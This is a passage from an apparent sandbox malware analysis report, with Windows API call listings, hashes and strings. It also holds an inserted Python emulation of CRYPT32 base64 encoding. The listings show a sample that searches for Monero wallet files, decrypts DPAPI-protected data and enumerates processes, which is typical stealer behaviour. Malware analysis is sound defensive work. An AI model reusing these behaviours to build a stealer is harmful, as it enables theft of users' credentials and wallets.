                                        • Opcode Fuzzy Hash: f856de9e43874260b8084e5b9f506ce8bda840bff019684311d9efc1f27bab2e
                                        • Instruction Fuzzy Hash: C6A2F7F3608204AFE3046F2DEC85A7AFBE5EF94720F16893DEAC487744E63558058697
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A60D73), ref: 00A4E4A2
                                        • StrCmpCA.SHLWAPI(?,00A614F8), ref: 00A4E4F2
                                        • StrCmpCA.SHLWAPI(?,00A614FC), ref: 00A4E508
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4EBDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 4275bfd09db450f2bc2631d23e74827d11c0695724ff23d6c012d30f33e32166
                                        • Instruction ID: 28cc35f194b914790e153c6a9755199985428dd9ff2c557bc1f1375e2bd4380d
                                        • Opcode Fuzzy Hash: 4275bfd09db450f2bc2631d23e74827d11c0695724ff23d6c012d30f33e32166
                                        • Instruction Fuzzy Hash: 0412E072B101189ADB14FB60DE96EED7378BF64301F4046A9B90B96091EE346F4DCB92
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A4C871
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A4C87C
                                        • lstrcat.KERNEL32(?,00A60B46), ref: 00A4C943
                                        • lstrcat.KERNEL32(?,00A60B47), ref: 00A4C957
                                        • lstrcat.KERNEL32(?,00A60B4E), ref: 00A4C978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 7643fec22a087c201ff18e6a61c50ce58c44e357b25287ec4c37932b50deddca
                                        • Instruction ID: 2720ff036cdbad98f69841c62871639a2290eba3789d4e8306b66a356baf688f
                                        • Opcode Fuzzy Hash: 7643fec22a087c201ff18e6a61c50ce58c44e357b25287ec4c37932b50deddca
                                        • Instruction Fuzzy Hash: 0B41607990421AEFDB10DF90DD89BFEB7B8BB48304F1045A9F509A62C0D7745A84CF95
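The function above decodes a string with CryptStringToBinaryA and then assembles a result with three lstrcat calls; the function near the end of this section goes the other way, calling CryptBinaryToStringA with the flag word 40000001, which is CRYPT_STRING_BASE64 (0x00000001) combined with CRYPT_STRING_NOCRLF (0x40000000). The Python below is an added example, not code from the report or from the sample: it emulates both CRYPT32 conversions for the base64 flag family so the flag word can be named and the output shape checked offline. The 64-character line width used for the default (line-broken) form is what CryptoAPI produces and is an assumption of this emulation, not something the report states.

```python
"""
Added example, not part of the Joe Sandbox report or of the analysed sample:
a pure-Python emulation of CryptStringToBinaryA (decode) and
CryptBinaryToStringA (encode) for the CRYPT_STRING_BASE64 flag family, so the
flag word 0x40000001 seen in the listing can be read and its effect checked.
"""
import base64

# Flag values as defined in wincrypt.h.
CRYPT_STRING_BASE64 = 0x00000001   # plain base64, no -----BEGIN/END----- header
CRYPT_STRING_NOCRLF = 0x40000000   # do not insert or append any line break
CRYPT_STRING_NOCR = 0x80000000     # use LF instead of CRLF for line breaks
LINE_WIDTH = 64                    # assumed: CryptoAPI wraps base64 at 64 characters


def decode_flags(flags: int) -> list:
    """Name the bits of a CryptBinaryToString / CryptStringToBinary flag word."""
    names = []
    if flags & 0x0000FFFF == CRYPT_STRING_BASE64:
        names.append("CRYPT_STRING_BASE64")
    if flags & CRYPT_STRING_NOCRLF:
        names.append("CRYPT_STRING_NOCRLF")
    if flags & CRYPT_STRING_NOCR:
        names.append("CRYPT_STRING_NOCR")
    return names


def crypt_binary_to_string(data: bytes, flags: int) -> str:
    """Emulate CryptBinaryToStringA for CRYPT_STRING_BASE64 (+ NOCRLF / NOCR).

    Default behaviour: the base64 text is split into LINE_WIDTH-character
    lines and every line, the last one included, is terminated by CRLF.
    With CRYPT_STRING_NOCRLF the result is one unterminated line, which is
    what the 0x40000001 call in the listing asks for.
    """
    if flags & 0x0000FFFF != CRYPT_STRING_BASE64:
        raise ValueError("only CRYPT_STRING_BASE64 is emulated")
    b64 = base64.b64encode(data).decode("ascii")
    if flags & CRYPT_STRING_NOCRLF:
        return b64
    eol = "\n" if flags & CRYPT_STRING_NOCR else "\r\n"
    return "".join(b64[i:i + LINE_WIDTH] + eol for i in range(0, len(b64), LINE_WIDTH))


def crypt_string_to_binary(text: str) -> bytes:
    """Emulate CryptStringToBinaryA with CRYPT_STRING_BASE64.

    Whitespace, including the line breaks the encoder inserts, is ignored;
    any other non-base64 character is an error, which the real API signals
    through a FALSE return value and here through an exception.
    """
    compact = "".join(text.split())
    return base64.b64decode(compact, validate=True)


if __name__ == "__main__":
    print(decode_flags(0x40000001))
    print(repr(crypt_binary_to_string(b"A" * 49, CRYPT_STRING_BASE64)))
    print(repr(crypt_binary_to_string(b"A" * 49, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF)))
```

Running the block shows the difference the NOCRLF bit makes: the same 49 input bytes encode to two CRLF-terminated lines under the default flags and to a single 68-character line under 0x40000001. The decoder accepts both forms, so a decode routine like the one above works unchanged whichever way the encoder was configured.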
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A4724D
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A47254
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A47281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A472A4
                                        • LocalFree.KERNEL32(?), ref: 00A472AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 15c48aabacaa3dc45209e803c7f363bb31b5b341fb9ea662b5568789dc51b06d
                                        • Instruction ID: 8025aa2242414fcefba0cf9ec2cb2785e2892a685f99b65662527eed27d90a99
                                        • Opcode Fuzzy Hash: 15c48aabacaa3dc45209e803c7f363bb31b5b341fb9ea662b5568789dc51b06d
                                        • Instruction Fuzzy Hash: 4D011EB5A40208BBEB10DFD4CD4AF9E77B8EB44B05F104555FB05AB2C0D7B0AA008B69
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A5961E
                                        • Process32First.KERNEL32(00A60ACA,00000128), ref: 00A59632
                                        • Process32Next.KERNEL32(00A60ACA,00000128), ref: 00A59647
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00A5965C
                                        • CloseHandle.KERNEL32(00A60ACA), ref: 00A5967A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 0cc381556755dcc37f18d63c88ac3346551478563c23cd0bd171476f4867aab8
                                        • Instruction ID: b7771cd8fd1c5f4d30f0612877261f5fa34b8e1a34adebfa09631816cc9ece5e
                                        • Opcode Fuzzy Hash: 0cc381556755dcc37f18d63c88ac3346551478563c23cd0bd171476f4867aab8
                                        • Instruction Fuzzy Hash: C7011E75A00208EBDB14DFA5DD58BEEB7F9FB48301F104199A90697280DB34AB48DF55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $5'$<-zQ$CG^3$h"
                                        • API String ID: 0-2769956882
                                        • Opcode ID: 35eb1c64345b726d0840d4eb52e0d2d1ecce096fec5dc3d908cd41643bd45b25
                                        • Instruction ID: e1e453170bcefee239d1d6aca1c6d90d52e3970cfbba0359c4e912ba380e20e9
                                        • Opcode Fuzzy Hash: 35eb1c64345b726d0840d4eb52e0d2d1ecce096fec5dc3d908cd41643bd45b25
                                        • Instruction Fuzzy Hash: 85B238F3A0C2049FE304AE2DEC8567AB7E9EF94720F16853DEAC4C7744E63598058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0o$CC|$G1>$M6re
                                        • API String ID: 0-1492517263
                                        • Opcode ID: 15da2aed524c8ec095c3876e2f2925b6f01f835fdf1876f9125aef9ff100a4c2
                                        • Instruction ID: 770e1e741a32d95ca3aa5342a3fc83df30d4123b6ce45553f667d7b53183104e
                                        • Opcode Fuzzy Hash: 15da2aed524c8ec095c3876e2f2925b6f01f835fdf1876f9125aef9ff100a4c2
                                        • Instruction Fuzzy Hash: 3AB215F360C2049FE304AE2DEC8567AFBE9EF94320F1A492DE6C4C7744E63598458697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !Tn$!Tn$8x<$LJo;
                                        • API String ID: 0-2759588429
                                        • Opcode ID: 9ad378754366187f9d7698e944912a89e46451f1877d9a33fb669ab8641e67e4
                                        • Instruction ID: 6e683796c21377695f290ea78adb7fabe6105347831a7091c2d311530d03228b
                                        • Opcode Fuzzy Hash: 9ad378754366187f9d7698e944912a89e46451f1877d9a33fb669ab8641e67e4
                                        • Instruction Fuzzy Hash: 53B20AF3A082109FE3046E2DEC8567AF7E9EF94720F1A493DE6C5D3740E63598058697
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A605B7), ref: 00A586CA
                                        • Process32First.KERNEL32(?,00000128), ref: 00A586DE
                                        • Process32Next.KERNEL32(?,00000128), ref: 00A586F3
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • CloseHandle.KERNEL32(?), ref: 00A58761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00A45184,40000001,00000000,00000000,?,00A45184), ref: 00A58EC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49AEF
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00A44EEE,00000000,?), ref: 00A49B01
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49B2A
                                        • LocalFree.KERNEL32(?,?,?,?,00A44EEE,00000000,?), ref: 00A49B3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A60E00,00000000,?), ref: 00A579B0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A579B7
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00A60E00,00000000,?), ref: 00A579C4
                                        • wsprintfA.USER32 ref: 00A579F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0160E650,00000000,?,00A60E10,00000000,?,00000000,00000000), ref: 00A57A63
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57A6A
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0160E650,00000000,?,00A60E10,00000000,?,00000000,00000000,?), ref: 00A57A7D
                                        • wsprintfA.USER32 ref: 00A57AB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 9V=a$t}?$yWz
                                        • API String ID: 0-76977012
                                        APIs
                                        • CoCreateInstance.COMBASE(00A5E118,00000000,00000001,00A5E108,00000000), ref: 00A53758
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A537B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A49B84
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A49BA3
                                        • LocalFree.KERNEL32(?), ref: 00A49BD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: PDGn$c3o?
                                        • API String ID: 0-3844238503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
